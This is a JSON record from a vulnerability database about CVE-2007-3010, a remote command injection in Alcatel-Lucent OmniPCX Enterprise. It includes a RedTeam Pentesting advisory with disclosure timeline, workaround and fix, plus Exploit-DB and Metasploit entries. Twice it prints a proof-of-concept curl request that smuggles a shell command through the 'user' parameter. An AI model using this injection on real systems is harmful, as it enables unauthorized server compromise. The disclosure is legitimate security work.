"https://www.exploit-db.com/download/10031/"}, {"lastseen": "2016-02-03T12:40:48", "description": "Alcatel-Lucent OmniPCX Enterprise 7.1 Remote Command Execution Vulnerability. CVE-2007-3010. Webapps exploit for cgi platform", "published": "2007-09-17T00:00:00", "type": "exploitdb", "title": "Alcatel-Lucent OmniPCX Enterprise <= 7.1 - Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2007-09-17T00:00:00", "id": "EDB-ID:30591", "href": "https://www.exploit-db.com/exploits/30591/", "sourceData": "source: http://www.securityfocus.com/bid/25694/info\r\n\r\nAlcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.\r\n\r\nAttackers can exploit this issue to execute arbitrary commands with the privileges of the 'httpd' user. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.\r\n\r\nAlcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are vulnerable to this issue. \r\n\r\ncurl -k \"https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\\${IFS}-l;\" ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30591/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-3010"], "description": "Code execution in Web interface.", "edition": 1, "modified": "2007-09-19T00:00:00", "published": "2007-09-19T00:00:00", "id": "SECURITYVULNS:VULN:8163", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8163", "title": "Alcatel-Lucent OmniPCX code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-3010"], "description": "Advisory: Alcatel-Lucent OmniPCX Remote Command Execution\r\n\r\nRedTeam Pentesting discovered a remote command execution in the\r\nAlcatel-Lucent OmniPCX during a penetration test. The masterCGI script\r\nof the OmniPXC integrated communication solution web interface is\r\nvulnerable to a remote command execution. Attackers can run arbitrary\r\ncommands with the permissions of the web application user.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Alcatel-Lucent OmniPCX\r\nAffected Versions: All versions up to and including R7.1\r\nFixed Versions: All supported versions\r\nVulnerability Type: Remote Command Execution\r\nSecurity-Risk: high\r\nVendor-URL: http://www1.alcatel-lucent.com/psirt/statements.htm\r\n reference number 2007002\r\nVendor-Status: Informed, patch available\r\nAdvisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php\r\nAdvisory-Status: public\r\nCVE: CVE-2007-3010\r\nCVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3010\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n"The OmniPCX Enterprise is an integrated communications solution for\r\nmedium-sized businesses and large corporations. It combines the best of\r\nthe old (legacy TDM phone connectivity) with the new (a native IP\r\nplatform and support for Session Initiation Protocol, or SIP) to provide\r\nan effective and complete communications solution for cost-conscious\r\ncompanies on the cutting edge."\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe OmniPCX web interface has a CGI script "masterCGI" which offers a\r\n"ping" functionality. By running the script with the parameters "ping"\r\nand "user", one is able to ping any IP address reachable from the server\r\nthe webinterface is running on.\r\n\r\ncurl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=127.0.0.1"\r\n\r\nThe ping will be done on the server, running the ping program installed\r\non it. The vulnerability lies in the "user" variable not being filtered\r\nwhen passed to the shell. Thus, arbitrary commands can be executed on\r\nthe server by adding them to the user variable, separated by semicolons.\r\nSpaces have to be encoded by using the internal field separator ${IFS},\r\nas any normal or URL encoded space will abort the command execution.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\ncurl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;"\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nDeactivate the Web server at the loss of some functionality not related\r\nto telephony service. Interpose a firewall allowing access to the web\r\ninterface of the OXE to IP addresses who should have access to the\r\nserver (e.g. maintenance technicians).\r\n\r\n\r\nFix\r\n===\r\n\r\nCorrect filtering of shell meta-characters and tighter access control\r\nhave been implemented in all supported versions.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe risk of this vulnerability is high. Any user which has access to the\r\nweb interface of the OmniPCX Enterprise solution will be able to execute\r\narbitrary commands on the server with the permissions of the webserver.\r\n\r\n\r\nHistory\r\n=======\r\n\r\n2007-05-07 First contact with head of technical staff of Alcatel-Lucent. \r\n Will relay the information to their technicians and call back \r\n with further information.\r\n2007-05-09 Response with a pointer to the Alcatel-Lucent PSIRT and the\r\n website http://www1.alcatel-lucent.com/psirt, where the\r\n process of reporting a security vulnerability is explained.\r\n The advisory gets mailed to the email address provided there.\r\n2007-05-10 Advisory gets acknowledged by the PSIRT\r\n2007-05-23 Vulnerability gets confirmed by Alcatel-Lucent\r\n2007-06-18 CVE number assigned\r\n2007-09-17 Coordinated public release with Alcatel-Lucent\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://www1.alcatel-lucent.com/psirt/statements.htm\r\nreference number 2007002\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting is offering individual penetration tests, short\r\npentests, performed by a team of specialised IT-security experts.\r\nHereby, security weaknesses in company networks or products are\r\nuncovered and can be fixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttp://www.redteam-pentesting.de.\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 963-1300\r\nDennewartstr. 25-27 Fax : +49 241 963-1304\r\n52068 Aachen http://www.redteam-pentesting.de/\r\nGermany Registergericht: Aachen HRB 14004\r\nGeschaftsfuhrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck", "edition": 1, "modified": "2007-09-19T00:00:00", "published": "2007-09-19T00:00:00", "id": "SECURITYVULNS:DOC:18015", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18015", "title": "Alcatel-Lucent OmniPCX Remote Command Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-06T05:18:56", "description": "This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker to execute arbitrary commands by specifying shell metacharaters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/HTTP/ALCATEL_OMNIPCX_MASTERCGI_EXEC", "href": "", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb"}]}